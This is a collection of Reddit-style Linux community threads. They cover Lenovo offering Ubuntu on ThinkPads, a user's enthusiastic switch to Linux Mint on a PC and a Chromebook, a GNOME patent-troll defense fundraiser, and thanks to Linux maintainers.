Lenovo finally followed Dells footsteps and is now offering all their P series ThinkPads with the option to have Ubuntu 18.04 pre-installed! The new P1 2nd gen, P53, P53s, P73 and P43s can be ordered with Ubuntu pre-installed beginning this June! 

&#x200B;

[https://youtu.be/yIflLxNyPBo](https://youtu.be/yIflLxNyPBo)
Does that mean ThinkPad users will finally have the recent official finger scanner driver??
Would have been nice if you linked to the press release instead of a video of you talking about it.
Finally, the question "What will it take to get Linux pre-installed on Laptops?" has been answered:  all-out trade war.
Will it be cheaper though? It doesn’t make sense if it comes out to be more expensive because it’s not hard to install Linux ourselves.
It's not shipping yet. It is shown just for some "coming soon" models. So this is still just marketing. ;)
Gimme dat X1 Carbon plz
They should just have an option to ship with empty drives.
I saw an option for red hat Linux. What do you guys think of it?
Of all the vendors I'll never again trust to pre-install my operating system.
And they still haven't fixed their botched IVRS table in BIOS on AMD models so the machine won't even boot without tweaking kernel parameters

[https://forums.lenovo.com/t5/Other-Linux-Discussions/ThinkPad-E485-E585-Firmware-bug-ACPI-IVRS-table/td-p/4191484](https://forums.lenovo.com/t5/Other-Linux-Discussions/ThinkPad-E485-E585-Firmware-bug-ACPI-IVRS-table/td-p/4191484)
I have an X1 extreme and their Linux support is terrible.
I wouldn't count on Lenovo for strong Linux support.
Similar verbiage was in the prior P1 announcement last year.  I got excited and then it was only available in certain countries (not USA) or to business accounts.  While I agree this would be great, the option needs to be available on the order page before this is news.

https://www.eweek.com/pc-hardware/lenovo-introduces-thinkpad-p1-its-thinnest-lightest-laptop-to-date

Edit-link to 2018 press release
nice, it's about time.
Does it still come with spyware preinstalled?
It's about freaking time!
is it cheaper though?
I'll still be buying used windows thinkpads.

can't beat $180 for an X230
this is awesome, i was just looking at those the other day.
What the P series? I always thought T series were the ones to get. Is this a higher or lower end line?
Pre-installed as in actually boots to install setup? Or the stupid pre-install where they create the user for you that you don't actually want?
I think even though it's a great thing, a small problem occurs. You would think it may increase the popularity of Linux, right? Well, I've seen it myself - some laptops with Ubuntu are displayed in a store and people unfamiliar with it try it out and they're simply lost. "The tab is on the left! What kind of Windows is that? Is it a glitch? What the hell is that?"

My advice, that unfortunately nobody will listen to, is to install a more Windows-like desktop environment set-up on those kind of laptops so that the average Joe feels comfortable with the and doesn't have that unpleasant moment where he realizes he doesn't know what to do there. It's very easy to do but nobody can fucking do it for some mysterious reason!

PS - I've even seen Endless OS installed on such laptops! It's such a crappy experience. Endless OS, albeit a nice concept, is completely under-cooked and it only gives bad rep to Linux.
It’s honestly better than Windows at this point. Linux has gotten better, Windows has gotten worse.
better than risking shipping them with windows and later trump decides Microsoft shouldn't do business with china
>lenovo

Should we expect an extraneous ``*`` certificate, a keylogger running alongside tumbler, or something?
Does it come with Lenovo malware?
Friggin finally!
My last thinkpad had a touchpad that stopped working after suspend or hibernate - in about 1 of 3 cases. I never found a solution, I never found any support from Lenovo, that was my last thinkpad.
Lenovo has had UEFI updates via Linux for a while. My X250 is too old to be supported but at least the fingerprint scanner works.
Not the first time...my friend bought an acer laptop last year with ubuntu 16.10 LTS pre-installed, works like a charm
French Lenovo store already lists "Ubuntu Preinstalled" for current P models  since a while, but it was never offered as a configurable option in the configurator so yeah... OK. I will believe it when it is available as an option I can choose.
I remember buying a t61 with Mint on it ages ago. Good times
So, that's not default, but an option to preinstall? What are they gonna charge for that now?
Personally, I’d rather get a machine without an OS and install it myself. That said, this appears to be the only way to buy a machine without being forced to buy a Windows license, so it’s much better than the alternative.
this is great news
Ah, so we can have our hardware spyware with our linux distros!
Do the fingerprint readers work? Or the horrendous hybrid graphics?
Next step is supporting libreboot now.
So Thinkpad will optimize the battery life on Ubuntu?
If I want to run Linux, Windows and Mac OS on the same Thinkpad, should I get Linux preinstalled or Windows preinstalled Thinkpad?  Will I be able to download all the drivers of another OS  from Lenovo website?
This will increase gnu/linux market share
Did this come out or not? I couldn't find it in their US website.
Holy shit, they followed the footsteps of Dell circa 2005.
Does this mean it's finally "the year of Linux on the desktop"? (A phrase from 1998).

Yawning cynicism aside, I'm glad to see firms take a risk like this :-)
Now if only Lenovo could make thinkpads again!
I’d love so much if the community would support more MacBooks. Fucking Broadcom also btw...
[deleted]
Lenovo is a spy agency for the Chinese government. Do not buy their products.
And how much bloat will they install?
Lemonovo comes with so many different flavours of bloatware on the Windows 10 pre-installed builds, I could only imagine a taint of telemetry and backdoors on the Linux builds.
Great. More college girls will have to drop out now. I hope this time they installed the internet
That maybe but it is still a deviation from the normal process which could increase cost.

I charge more to install my software on Linux. Why? Because my build/install process for Windows is 85% automated whereas for Linux it is about 65%.
And? A free market capitalism is basically the same thing but people try to get rich. You are splitting hairs which is a bullshit argument tactic.
So I decided about two weeks ago I was finally sick of having Windows on my computer. I was trying to edit together a video and I couldn't get my microphone drivers to work. They would cut audio randomly while I was recording. The system was running very poorly on my older gaming PC. I intend to upgrade the hardware in the future but I mostly play older/low graphic games anyways so it's not a big deal to me. I also manually disabled a ton of Windows bloat that were leading to annoying issues like a "nag" message to reinstall the Windows Gaming overlay for example.

I decided to go with the Cinnamon Mint distro. It was a super easy install. I honestly expected it to be a little more... uhh... complicated? I can't speak for everyone but I found flashing the usb and installing it to be really simple. The only hang up I had was right before I attempted to install it I lost power for a day. Substation in my town blew out. Most people are saying it was the AC's running on a hot day, but  I think it was the raw power of Linux back feeding into it. Hard to say, but I'm no electrician after all.

I planned my switch pretty carefully. I backed up everything important and went into Linux with an open mind and a plan to start using the open source software. I wanted to make sure I didn't have any compatibility issues and the best way to overcome that was just to use the software available to me in the repositories. I found everything I needed there pretty easily. I downloaded Steam and tested the games I wanted to keep playing. They all ran smooth as butter.

Since I was having so much fun and I had everything set up on my gaming pc, I had another idea. I dusted off my old Chromebook I'd left for junk a few months ago. The poor thing was on it's last legs, no more updates from Google and the battery life was a joke.I remembered that I saw a YouTube video where someone installed Linux on their Chromebook so I decided to give it a shot. I opened her up, pulled out the screw that disabled the read/write on the Chromebook and flashed the MrChomeBox bootloader on to my Chromebook. I was also able to easily get Cinnamon Mint working and I'm writing this post from that same Chromebook right now.

Yes, my old baby from 2017 is back alive again and with some tweaking I've managed to get everything running on it pretty damn well with a few exceptions. The battery needs to be replaced. That should be simple and not really a software related issue. The only software issue I ran into was the sound drivers don't work at all. I'm still troubleshooting the problem but I have a work around. I just use my bluetooth speaker and the audio plays fine through there. Troubleshooting this issue is giving me an opportunity to mess around with the terminal a lot too and it's been so much fun.

I honestly feel like a kid again. Computers had become a function of life instead of a playground like they used to be for me when I was younger. I loved messing around with my old Windows 95 pc and playing in dos always felt so cool to me. I'm really happy I made the choice to switch to Linux and I look very forward to learning more and more about it.

Here's a screenshot of my [neofetch and my desktop](https://ibb.co/WGKcb2K). I know it's not for everyone but the partially transparent windows are really doing it for me 😁

Edit: Wow this blew up. Sorry I couldn’t get to everyone’s comments individually. Thank you so much for the advice and support on my chrome book as well as the positive comments. You guys are the best 💚
I agree whole-heartedly!!!  I've been using Linux since the late 90's.  When I 1st started using it, it reminded me of my old C64 days from High School.  Learning something new is always awesome in my book.  

If you need to install any OS on a Chromebook, I would highly suggest using CoreBoot.  It replaces the BIOS of the Chromebook.  Basically, CoreBoot turns a Chromebook into a standard laptop.
 Very wholesome story indeed. Just one tip, learn to ignore the very vocal minority in the community who will tell you that you installed the wrong version of Linux :) That you need to "upgrade" to more manly distros.
> but I think it was the raw power of Linux back feeding into it. Hard to say, but I'm no electrician after all.

Pretty sure it's a safe bet that Linux draws less power because your disk won't be thrashing for hours doing.....whatever the hell Windows does when the disk is pegged at 100% for ages.
> Substation in my town blew out. Most people are saying it was the AC's running on a hot day, but I think it was the raw power of Linux back feeding into it. Hard to say, but I'm no electrician after all.

As a Electronics engineer I approve your theory of Linux backfeeding into the grid. We here at r/Linux usually want to keep things like this under wraps but every once in a while a brave soul wondering from deserts of Windows enters into mainland Linux and for a brief time people accidentally see true power of Linux.

Welcome to the land of distros. We are divided by distros but united by Kernel.
Welcome! Glad your loving it. I felt the same when I made the switch. It's like seeing the world through new glasses. I remember saying to myself, "So THIS is computing," as I dug around in my file system, and got acquainted with every piece of software on my machine. I am so glad I stepped out of the Matrix and into Linux. 

Might I suggest checking out Alacritty or Kitty. They are GPU-driven terminal emulators. Customizing my terminals in the config files really kicked off my rekindled love for computing.
> I honestly feel like a kid again. Computers had become a function of life instead of a playground like they used to be for me when I was younger. I loved messing around with my old Windows 95 pc and playing in dos always felt so cool to me. I'm really happy I made the choice to switch to Linux and I look very forward to learning more and more about it.

So much this! Before Windows XP we had so much more freedom with our PCs. When I switched to Linux the first time in 2004 I had so much fun to have power over my system again and shoot myself into the foot when I compiled my own kernel for the first time lol
Too damn right. I started six months ago and never expected to actually *enjoy* setting it all up so much. It's so much fun discovering new tools and programs I'd never even have a need for before.

Setting up a Samba share, custom backup scripts, KeyD profiles and even just learning Bash scripting in general. Feels like I'm new to computers all over again: Except this time I'm not a lazy shit and I'm actually willing to learn!
Welcome to the dark side! We have cookies… and a fantastic online community
Remindme! 187 Days  
  
Gunna bury this here cos don't feel like my own Glow Up Linux post, but might want to check in say six months from now see if still happy with the choice.  
  
Not new to Linux - first dabbled with it in mid 90's cos was already bored by what Windows 3.1/95 (I was bridging OSs) could do, or more to the point disallowed me from doing.  
  
Anyhoo, never became a guru, just dabbled here and there over the years.  
  
Never had Linux as a daily driver or used any GUI/desktop really, since pretty much all my professional work at since late 90's has involved MS ecosystem stuff predominantly. So it was just "easier" to live with the mental harm Windows afflicts.  
  
Fast forward to last weekend - W11 updated all my preferences on my laptop which is my "on the go must never fail in the field beast" because it decided that the way I'd set my system up wasn't how I should be using MY computer, and were kind enough to change EVERYTHING so that NOTHING works any more. Well, now I have fucking Candy Crush on the go. Yay.  
  
So yah, fed up, not up to date with all the Linux stuff - I only use it peripherally for some server things and whatnot - spent a couple hours checking the popular vids/blogs/etc from last couple months (I'll deep dive on more interesting later, but for now I just wanted "popular" and "easy") and decided to waste a weekend getting set up.  
  
Well, after a few false starts of trying the USB boot route (each time was filled with compromises that eliminated my ease of use scenario) which cost me maybe 4 hours (nothing in the scheme of things compared to "fixing" Windows yet again), I partitioned a basically brand new laptop and installed LMDE within 15mins, and was like... uhhhh ok, that's it?  
  
And yeah, that's it. 90% of what I need to do just works, there's a few underlying management issues that I need to retrain my brain for, but that's not hard coming from a programming background with decades of CLI.  
  
I think what I want to point out is the "that's it?" part.  
  
Because in Windows when you install/reinstall/update/fart you have to go through a whole series of events, then fix shit they fixed "because you're not doing it right", then find out some of the crucial daily muscle memory lizard brain things you're used to have changed "because progress"  
  
When I installed LMDE there were a few basic getting some shit set up things, and some other desktop personalisation tasks to deal with - but otherwise that was it. No 73 notifications per hour about all these other "features" and "productivity tips" and "relaxation games" and "omg dragons be here get this software" and "moving targets of where you put stuff" etc etc that you get with a Windows install nowadays.  
  
BTW this is coming from someone who did the full 3.1 install in early 90's that was on like, uh, 21 disks I think?  
  
Other factor now that really matters which I think is why MS is really doing that last mobile games deep thrust dab into it's users right now is that within the next couple years the idea of an "OS" that you subscribe your life to is going to disappear.  
  
95% of my life is now "in the cloud" (let's have a better term, please), apart from a few video games installed on my hard drive - if all of my equipment went poof today, and all I had access to was any computer and internet - I'd be ok to live my life and run my company and do work just fine.  
  
And I think this realisation that you're no longer beholden to a device or operating system etc will come to many more, soon enough.
Do you vim , my dude?
> I planned my switch pretty carefully. ... They all ran smooth as butter.

Congratulations on a well-planned switch :)

> Troubleshooting this issue is giving me an opportunity to mess around with the terminal a lot too and it's been so much fun.

Good mindset :) Just hope that you don't have to troubleshoot an important machine, because in that case it ISN'T fun if you need to get stuff done.

> I honestly feel like a kid again. Computers had become a function of life instead of a playground like they used to be for me when I was younger. I loved messing around with my old OS/2 Warp 3 (<- fixed that for you) PC.

Same here :)
Why do you think we switched too? It's too funny 😀😀😀
Nice, congrats. Have fun!
I honestly love reviving someone's old computer with it. Then teaching them how it works. It's like their eyes have been opened.
oh yeah, Linux definitely makes it so much more fun. I actually enjoy using it, Windows and macOS both make me annoyed  
also transparent terminals ftw!
The best time to learn Linux was 20 years ago. The second best time is today.

Enjoy the ride.
Dang, maybe I should have waited until I was 40 to switch... Did when I was 16yo now what am I going to do to have the most fun with a computer since I was a kid :D
Oh god if you start a sentence with saying "I couldn't get my microphone drivers to work" on a windows installation don't expect to have people taking you seriously.
Congratulations now the next logical step Linux From Scratch.
Are you recording gameplay and editing videos on Linux as well? If so, what software are you using?
Welcome to the club! Linux Mint is the way to go. I just wished it's endorsed more by the community instead of Ubuntu.
I haven't switched but I've been slowly learning it (very very slowly) for several years and it's slowly re-ignited some of my passion for computers.

I wish I could spend more time with it.
Super happy for you! Anyone who has experience installing Windows will find installing any Linux distro much easier (except for LFS and Arch maybe). Feel free to ignore anyone who says that your distro of choice sucks for whatever reason, you'll know yourself when (or if) you need to distrohop.

As for Steam, if you have any games that don't have native Linux versions, you can always go into the advanced settings of a game and turn on the Proton compatibility layer, I have not yet encountered a game that wouldn't work with it.

As for audio recording, I have to confess that that is still the one thing I boot to Windows for haha. Discord, OBS and other more conventional software work out of the box, but I couldn't get Bitwig to recognise any audio inputs or outputs for the life of me, so Ableton it is.
Bluetooth speaker works, so audio drivers should work fine? Or something like with my thinkpad, where only the jack needs SoundOpenFirmware to work (and pins are reversed)?
Welcome. Enjoy Linux Mint. I also started with it many years ago. And later try out one of the other distroes, it's amazing how different they work under the hood. And if you want to learn a lot more, go the crash course of installing arch or gentoo. 
I also suggest at some point later to look up LVM disk management, one of the best pros for Linux compared to windows and gives so much flexibility when upgrading or adding hard-drive.
But don't rush it, all in its time and when you feel the itch to tinker and learn more.
If you're using an Apollo Lake Chromebook, take a look at [this](https://www.reddit.com/r/chrultrabook/comments/uc0b6i/howto_audio_on_apollolake_devices_under_linux/). It shows how to set up audio. It's written by MrChromeBox and I've used it myself.
My first computer used Ubuntu 10.04 and since then I had a 8 year hiatus where I then picked up Linux again from Ubuntu 20.04, which I ended up escalating to using Linux almost exclusively. It's definitely a lot of fun when things work which they usually do, and not too hard to fix when problems come up.
I still use 2 computers from 2010, one with Mint 21, the other with Debian Buster (still need to upgrade to Bullseye). And they both run great! I have newer computers as well, but those are my oldest that are still in use! My Asus U43F still has a 5+ hour battery on it with the original battery! Linux rocks!
As a teen that also just switch I can concur lol, its just soooooo much fun
Wait til you start playing around with Bash and other scripting tools. I’m guessing from this post you’re not a programmer, but the level of control and automation you can get from a command line is like crack for me, it’s so enjoyable
lol... drivers
Bravo! Glad you found new joy in computing. I can say I felt much the same... though a bit different. I was tired of feeling limited by the likes of MS and Apple, and Linux unlocked those doors, and let me full on play freely with my machines as I saw fit. It's a liberating and enjoyable experience!

Better still - the deeper you go with linux, the more fun it gets and the easier it is to solve problems as they crop up (nothing is perfect).
Paging u/gabriel_3, he's quite knowledgeable about Linux on Chromebooks. He helped me fix an audio issue with my Chromebook.
which screw disabled the read and write on your chromebook?
Great!  
I've transitioned on Linux (Garuda GNOME to be precise) on all my machines almost a year ago  
I mostly do two things on my PCs: code and play games  
For the first one well, Linux has always been really good, for the latter Proton and Valve helped a lot lately and I'm finally able to play everything I was playing on Windows as well, even EAC tiles finally  
The only thing which happened lately, there's an insane amount of static noise on my microphone, it doesn't happen on Windows and I have no idea how to fix it, asked on formus, received little to no support  
To be clear this won't make me go back anyway, I'm enjoying Linux too much. Also on my desktop PC I still have a Windows 11 partition, I use it rarely but when I do I always encounter some bug/issue I swear.  
  
Tl;Dr Enjoy Linux, take your time to learn it and be patient, it has a LOT to offer
Omg that desktop wallpaper !! 

Power to the players
I've been using Linux for so long I literally get annoyed whenever I have to use Windows 10 for anything. Little things about it really bothers me.
And the cool thing is that you can do distro hopping as long as you found out what fits you.
Same here. One week in and I’m loving it
I am a bit sad, because I finally have my sway setup working exactly as I want. There is nothing more to do for me, because I'm happy with this setup. Guess it's finally time to just use the system.
If you want to deep learn linux, read Linux Bible 10th edition. Also learn to use and personalize vim text editor to make your text editing more efficient.
I’m an all inclusive type of guy. I believe every OS has it’s place. My MacPro, with it’s multiple HD bays and nvme drives, multi-boots two macOS versions. (Mojave and Monterey, currently) Ubuntu and Windows 10. Heck, even my Windows Tablet triple-boots Win 10, Ubuntu and Android x86! (BlissOS)
Fr, Linux troubleshooting is so much more fun than Windows troubleshooting and the terminal have so much more functionality than the command prompt. I enjoy tinkering with my Dell Latitude D620 running Arch and honestly, it is so much stable and fast compared to Windows 7.

Also recently, my class requires me to download this one program and it can't run on Windows because windows says that I don't support this particular opengl version. Ironically, when I installed the same program on Linux, it works just fine! I honestly don't know why Windows can't run the program while it really can run it. I am loving Linux.
It's a lot of fun right? Next, you'll be running a Minecraft server on a Linux machine without a GUI.

Keep up the pace, it only gets better / more frustrating from here haha!
Wait until you find out about cube desktops, burning windows and riced window managers. Check /r/unixporn
One other thing you can do once you get a bit more familiar with things is prioritize audio processes to make sure they’re given the least latency and help avoid dropouts. I actually tweaked my Debian setup for audio specifically and it’s been great, been recording some stuff I wrote with a buddy of mine.
Oh man, you made some of my childhood feelings around first trying Linux emerge.

I remember getting scared when I ran 'ping' for the first time and it didn't end after 3 pings like in DOS.  I was scared the computer was going to overheat or that I was racking up a monster phone bill or something and turned it off at the wall.  I later Asked Jeeves how to quit a program on Linux and figured it out.

I also remember spending hours getting ALSA to work, having to use dodgy tools to download binary blobs from my USB ADSL modem for Linux to be able to use it, and vowing to bring the eldritch fire of the old gods down upon whoever was responsible for me having to write X11 modelines to get my displays to work.

But all that was way more fun and exciting than the boring, slow, buggy, UX nightmare of Windows at the time.  Every time I broke my Linux set up, I thought of the hell that had been Active Desktop and happily went about learning what I'd broken and how to fix it.
Now load up conky and spend the next month tweaking your desktop with widgets, graphs and guages.  Personally I love mint/cinnamon as the UI is pretty close to the last version of Windows that I found tolerable (Win 7) and everything just makes sense.

I too love a slightly transparent terminal window.
switch to fedora, trust.
Cringe, this thread makes Linux look more like a cult than some software
I remember sitting on the floor of my parents study with old computer parts, piecing together a working build. I didn't have windows at the time so I decided to give Linux a go. I got my USB with shiny new solus budgie and installed it. Ran so smooth, even on old hardware. I won't ever forget my first core Linux memory and I hope you don't either!
Linux based operating systems truly are wonderful
Couldn't agree more! I switched to daily driving Linux about six months ago after a job change found me working with a purely Linux-based software stack. I had such a similar experience of feeling like a kid again. I'm now constantly tinkering with something in my free time -- there's just such a delightful amount of freedom compared to other OS's.
Love your post.

For what it's worth: I put Debian on a Chromebook ages ago (same process you describe with the screw) and the sound didn't work. There's something demonic about those Chromebooks.
Can someone explain the differences between distros to me? I rarely know if I'm using the preferable one. I've only used unbuntu (on windows parition) and Debian (on raspberry). If I did what OP did on my old chromebook could/should I use unbuntu?
I feel the same. I'd used it experimentally since the late 90s, but the past couple years or so, I've fallen in love w/ it.  Just going through the projects on awesome open source and searching around github made me want to pursue programming as a career, something I abandoned 20 years ago. And setting up a home lab with all the junky computers i've had in the closet for years has been a blast. They're old, but they'll run antiX great!
Your title for this post echoes exactly how I felt when I started using Linux. I could never put it into words like that before.
Good choice with Linux Mint Cinnamon! My distro for my gaming PC as well and i think its the best desktop one out there currently
I had a similar process back in 2020, just around when lockdowns started...

**TL;DR**: Linux is fun, I've been troubleshooting it for years!

For YEARS I had been extremely interested in dual-booting an operating system alongside my main Windows partition, and failed successfully multiple times (accidentally overwriting windows on almost every occasion). Around 2017 I installed some Mac clone OS properly, and installed Remix OS overtop of Windows. I didn't know what to do, and took about a week to figure out how to reinstall windows. Years later my friends tell me to install Void Linux, so I decided to give it another shot, since I'm still very interested at this point. I think I managed to install Cinnamon. The background image was a simple black/grey, and everything looked new to me. I had no clue that Belena Etcher or the DD command existed, so I was completely STUCK using this operating system, having no clue what to install or do. I wasted about a week or two staying up until about 8AM watching Are You Afraid of the Dark for hours on end, and looking back at it, it already feels nostalgic.

After another one of my friends finally decided to help me grab the smallest version of windows I could cram onto a 4GB SD card I could, I either reinstalled Windows, or dual booted it with a second hard drive.

I then went on to try to install Void again multiple times, then I tried Ubuntu, then tried Lubuntu and reinstalled it every time I ran into an issue (which was multiple times every single day. I was swapping and reinstalling distros left and right for about a month or two, until...). Then I finally found Manjaro Linux.

It was at this point that no matter what os I used or what drivers I could find and install, my xbox 360 Xplorer guitar would NOT work, not to mention my usb drives completely stopped mounting and I could not figure out why. I installed Manjaro, and everything worked out of the box without the need of installing any extra software or drivers. I was very surprised! Maybe I had finally found the distro for me!

Turns out, I did! I've been using Manjaro Linux and i3 since mid-late 2020, and I have been having such a fantastic time with it (except for when I don't use it for months and I can't update the system, very recent issue I've had where I can't update anything and everything becomes corrupt so no packages were installed).

Right now I'm actually flashing Manjaro KDE because I just got a new old tablet-laptop with touchscreen capabilities, and I want to be able to use it. I hope that goes well, and although I've been using i3 for years and am a little reluctant on using KDE again, I'm still excited to see what I'll be able to do on this machine!!
What you enjoyed in the last few days. I'm enjoying for the last 12 years. Linux all the way. Imagine what you missed.
>Yes, my old baby from 2017

Mostly unrelated, but it's wild to me that we'd consider hardware from 2017 old nowadays. The industry really has done us dirty, hasn't it. Thankfully, right to repair is making very uneven, but forward steps and things are looking brighter.

I'm glad you're having fun, there really is something genuinely satisfying about reviving old hardware, isn't it! Loved the screenshot, transparent terminals remind me of my own first steps on Linux, that brought back some nice memories. \^\^

Cheers!
The patent troll defense fund has crossed over the 100k mark! Our adversary is getting nervous.  Let's make them sweat some more. The funding has been coming almost on average of 15 minutes per pledge. I just want to thank all of you for your kindness and generosity. We are so grateful. Fighting bullies is something we can all appreciate and come together for. Let's continue to show them that an attack on one of us is an attack on all of us. Let's set the precedent. Not only should they not patent troll us, but that we will fight back and take their patents away from them if we can.

Help get us to 125k! - [https://secure.givelively.org/donate/gnome-foundation-inc/gnome-patent-troll-defense-fund](https://secure.givelively.org/donate/gnome-foundation-inc/gnome-patent-troll-defense-fund)
Are the funds raised and used to fight this patent troll lost forever, or the troll must pay for any costs and damages it causes? (like I imagine it would be in civilized country).
The price of freedom is eternal vigilance.

I've gladly donated and I'll feel no hesitation donating again is it's so required.
I don't use Gnome and I dislike a lot of the technical decisions made, that said I've happily donated towards this effort.
This is not about that though, this is about so much more.

Keep fighting the good fight for all of free software! Thank you for all your hard work.
[deleted]
[removed]
Why can't these companies get funding going to fix the broken patent system in the first place?  The fact companies have to spend this much money to protect themselves from bullshit is insane.

Isn't there a way to outlaw patent trolling altogether?
Link for the lazy (I was out of the loop on this one so wondered what the flip was going on):

https://www.gnome.org/news/2019/10/gnome-files-defense-against-patent-troll/
[deleted]
Give 'em hell, boys.
[deleted]
Gnome is my favorite desktop. FOSS is the reason I switched to Linux years ago. So yes I'll donate
What happens to all the money when the patent troll is forced to cover legal costs?
Why doesn’t Red Hat help assist with the legal fund for GNOME?
Wow this is huge!! I’ve donated some days ago so I couldn’t be happier on this news! Wohoho
Made my first gnome extension last year, I'll say it wasn't painless but I can't quantify the equivalent dollar amount that open source has contributed to my knowledge and skills as a software developer and what I have used on a daily basis at home and on the job to complete projects. Many things people take for granted would not be possible without the FOSS community. Happy to give back! Stand strong for all of us!
I hope these patent trolls go bankrupt. Although knowing modern society, they'll probably scatter like roaches and pop up as a new company.
More links for the lazy

His patent showing drawings of "user bob's camera transferring photos to a rectangle" [https://patents.google.com/patent/US9936086B2/en](https://patents.google.com/patent/US9936086B2/en)

His legal firm [https://www.patentmgmt.com/about](https://www.patentmgmt.com/about)

List of his patents [https://patents.justia.com/inventor/leigh-m-rothschild](https://patents.justia.com/inventor/leigh-m-rothschild)

Video of him i'm about to watch [https://vimeo.com/258169932](https://vimeo.com/258169932)

Looks like he sued Viber (Rakuten) [https://portal.unifiedpatents.com/litigation/Delaware%20District%20Court/case/1:18-cv-01158](https://portal.unifiedpatents.com/litigation/Delaware%20District%20Court/case/1:18-cv-01158)
Just move here, to Russia. Internet is luxurious, and no one gives a damn about vague patents.
Seems what he's doing instead of offering to buy out someone he sues them first then offers settlement money and at that time patent is judged in his favor even if there's no basis for it?
Let's do this! Already donated, con el software libre no perrito
I hope you beat them like a rented mule.d
I'm all with your battle, and was happy to donate, like many others. As other suggested, if you win, and get back the money you used for the trial, keep it for later trials.
First time donating money to FOSS. 10/10 will do again.
can't you find a better nation where to base your office? do you really have to be all that stars and stripes?
Can someone explain what we are fighting here?
Just donated:)
  1q0
I am not a Gnome user, but I'm supporting Gnome in this legal fight against the patent troll.
Just chucked in 10 dollars, I hope the troll ends up paying all the costs.
I don’t really like that they plan to just pocket the excess
Added $10 to the cause.
That's great to hear.  It's retarded that we live with a shitty legal system that even requires this though, but I wish them best of luck to fight this crap.
Added my 25 bucks to the fight!
Could the GNOME foundation please just set up a GNOME Subscriber monthly donation thing? I pay $10 a month for Google Music, but I use GNOME every day and have for 15 years. Take my money - and not just for patent troll defense! Pay some devs. Offer some privacy-respecting paid services that work with the desktop. Etc etc.
'Murica
Now we know the reason why GNOME has less and less features and poor performance. It even has to remove title bars from windows.

Damn patent trolls.

I hope Apple will not sue for overlapping windows...
Every time I interact with a Windows/any Apple environment, I feel especially grateful to have this well maintained gem that is (GNU/)Linux. Not only is it super well made, it also helps me believe in humanity where otherwise I see mostly greed and new disgusting mechanisms restrict freedom and monetize peoples actions (I still cannot get over the fact that win10 comes with mfking candy crush by default).  
Therefore, a big shoutout to all the maintainers who spend their spare time making other peoples lives better!
It's true. I always use GNU and Linux as an example when someone brings up the "computer people are antisocial" argument.
[deleted]
I agree with you, but bear in mind the "mostly greed" folks make massive, *massive* contributions to open source, a lot of which finds its way back into linux distros. That includes the "Windows/any Apple environment" folks. 

They don't do it for a sense of community, nor for humanity. But they enrich the open source community all the same.
Oh Linux kernel, you so crazy. I have been studying you for so many years now and you still amaze me like first day.
hear, hear.
I couldn't agree more. Linux is a true beauty and I also couldn't be more thankful for all the people who made it possible for me to have such a stable and convenient OS. And not only it is stable and convenient, but I am also able to modify it to my needs. I am not limited to one crapware DE as in Mac or Windows (or any other crapware). Even if I do not personally change something, that still means that I am able to select among a huge list of different distributions, where different nice people picked different approaches and ideas. It means that there is a huge diversity of different options where anyone can find something to their taste. The true implementation of the idea that "one size doesn't fit all", as opposite to proprietary crapware.

I know that this is just a reiteration of Linux selling points, but they are so true and I am so glad to have them!
I agree, windows 10 really takes the cake on how much tracking and bullshit is installed by default and will probably bring quite a few new Linux users.   And with seeing the seedy underbelly of all these big tech companies this last year I find the tracking stuff really creepy and one of the huge advantages of Linux, at least I know with Linux my OS is not tracking me, and if there are trackers I can take them out.   If Linux ever gets to the same level as windows with gaming , and they are getting close now, then windows will be in real trouble, I know quite a few people who have said gaming is the only thing keeping them on windows when at home.
English is not my first language, but I would like to join in this big Thank You ! to all the wonderful people that make possible to use Linux in all of my PCs. I just dont' feel home in my own PCs (!!!) if there is Windows, or Mac on board.

So thank you very much for your work that makes all this possible !
_pssst! Windows 10 LTSC doesn’t!_

:P

But yes I feel the same way.
I can see why mcaffe comes bundled on some oem’s (i dont like it) but candy crush was always something that really surprised me. 
What agreements made with that company I would love to know.
Im sure Microsoft would not risk their reputation over this type of bundle for pennies.
And the contributors (including bug reporters). And the occasionally enjoyable flamewars.
>Therefore, a big shoutout to all the maintainers who spend their spare time making other peoples lives better!

Hear, hear. 

For the first time in probably 20 years or more, I was suddenly "excited" to use a computer again after I switched from MacOS to Kubuntu a year ago...although my IT friends who convinced me to switch probably weren't too thrilled with all my questions for the first few months!
I wish to be a maintainer one day... currently I am intermediately C programer
I second that notion.

I have to work with Windows (server/desktop) all day long due to my job, I really *do not want* to endure one more second of this intrusive and annoying OS after work.

"Oh, you want to JUST watch some youtube videos? Please let me FORCE you to update first, come back in an hour when I am done." 2 years ago, I had enough. Never looked back.

That update orgy alone seems to slowly grind on my wife's nerves as well. A die-hard Windows user since 3.11 she now signaled being open for a dual boot, after seeing I never HAD to update, but could, at any time, and it would just take seconds to a few minutes max. She even asked why there were no constant popups of apps that want to be updated, as it happens on Windows *every frikken time* she boots into it - besides all the Windows updates. When I explained the concept of a central package manager and saw the recognition of a great idea in her eyes I knew the seed for a future Linux user was planted. (One of us!)

Plus the last few "feature" (ghaa) updates Win 10 did and which w/o asking - among other things - re-enabled all the spying, sorry, "experience-enhancing" settings may have pushed her over the edge, heh.

Now, if I could just have that really well-made 3D Builder app on Linux, I would not need to ever, EVER boot that thing ever again (and every dang time, because it has been weeks, endure the update orgy) ...
Me when using windows to do weird nerdy things: Ugh!

Me when using linux to do weird nerdy things: Ah. Much better.
Slightly off topic, but how are you all getting the distro logos by your usernames? I'd like to show my appreciation for the distro maintainers (see, it is on topic!) by adding one to my account.

As to the the OPs original message, I couldn't agree more. The fact that people take time out of their busy lives to create tools that are genuinely exclusively for the betterment of others all over the world is absolutely astounding to me. GNU/Linux isn't just an OS as a platform for selling the end user products and services they don't really need, it's actually a resource for getting done what you want and need done, all getting done exactly how you want it to.... And if it can't do your specific task quite how you want it just yet, you can program the functionality in or ask the amazing FOSS developers to help and they very likely will. Honestly this community and its message are such a breath of fresh air. 

Now back to my original question, how do I get those logos?
I swapped to Ubuntu today after using Windows ever since I had my first computer around 2008. Such satisfaction, just messing around in VSC and my customized terminal... it reminds me of the time I first discovered computers and software. It’s beautiful.
I also want to make a huge thanks to all the testers, thanks to them I can enjoy a stable system while still using a 'bleeding edge' rolling distro.
I am where you first started. 😎

sudo okaynowwhat?
The GNU/Linux kernel may be more corporate (if still Libre), but I do appreciate the communities that make all the rest of the ecosystem! 

And it's amazing to see how much progress Linux has made on the Desktop in the past 15 years.
Unpopular opinion: Well, Windows93 came with solitare and minesweeper and I think that's kind of a neat thing.
\*Cough\* ExTiX \*Cough\*
AGREE!
> I still cannot get over the fact that win10 comes with mfking candy crush by default

And ads in the start menu.
That if you take them out, next update will likely reinstall them...
